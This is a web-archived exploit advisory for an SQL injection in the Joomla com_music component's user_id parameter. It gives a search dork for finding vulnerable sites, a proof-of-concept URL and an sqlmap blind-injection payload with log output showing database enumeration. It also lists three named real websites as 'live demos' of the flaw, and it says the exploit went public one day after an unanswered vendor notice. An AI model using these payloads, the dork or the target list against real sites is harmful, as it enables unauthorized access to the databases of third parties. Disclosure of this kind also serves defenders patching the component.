Home / os / solaris

Joomla com_music SQL injection Vulnerability

Posted on 30 November -0001

<HTML><HEAD><TITLE>Joomla com_music SQL injection Vulnerability</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>###################### # Exploit Title : Joomla com_music SQL injection Vulnerability # Exploit Author : xBADGIRL21 # Dork : inurl:index.php?option=com_music # Vendor Homepage : http://www.raindropsinfotech.com/ # version : 1.0.0 # Tested on: [ Kali Linux 2.0 ] # skype:xbadgirl21 # Date: 2016/07/15 # video Proof : https://www.youtube.com/watch?v=RNjp-FaiNiw ###################### # [+] DESCRIPTION : ###################### # [+] an SQL injection been Detected in this Joomla components music after you add ['] or ["] to # [+] Vuln Target Parameter you will get error like : # [+] You have an error in your SQL syntax; check the manual that corresponds to your MySQL # [+] server version for the right syntax to use near ''' at line 1 SQL=SELECT ###################### # [+] Poc : ###################### # [user_id] Get Parameter Vulnerable To SQLi # http://127.0.0.1/index.php?option=com_music&task=getUserAlbumFeeds&no_html=1&user_id=99999999'&lang=en ###################### # [+] SQLmap PoC: ###################### #Parameter: user_id (GET) # Type: boolean-based blind # Title: MySQL >= 5.0 boolean-based blind - Parameter replace # Payload: option=com_music&task=getUserAlbumFeeds&no_html=1&user_id=(SELECT (CASE WHEN (1963=1963) THEN 1963 ELSE 1963*(SELECT 1963 FROM #INFORMATION_SCHEMA.CHARACTER_SETS) END))&lang=en # [14:18:22] [INFO] GET parameter 'user_id' seems to be 'MySQL >= 5.0.12 AND time-based blind (SELECT)' injectable # [14:22:39] [INFO] the back-end DBMS is MySQL # web application technology: Apache # back-end DBMS: MySQL 5.0 # [14:22:39] [INFO] fetching database names # [14:22:43] [INFO] the SQL query used returns 2 entries ###################### # [+] Live Demo : ###################### # http://saborcristiano.com/index.php?option=com_music&task=getUserAlbumFeeds&no_html=1&user_id=184'&lang=en # http://www.radiosaborcristiano.net/index.php?option=com_music&task=getUserAlbumFeeds&no_html=1&user_id=100'&lang=en # http://www.christianflavor.com/index.php?option=com_music&task=getUserAlbumFeeds&no_html=1&user_id=1'&lang=en ####################### # Disclosure Timeline: #====================== # [+]Exploit Discovered [15-07-2016] # [+]Vendor Notified [15-07-2016]: No reply # [+]Exploit Published [16-07-2016] ###################### # Discovered by : xBADGIRL21 # Greetz : All Mauritanien Hackers - NoWhere ###################### </BODY></HTML>

 

TOP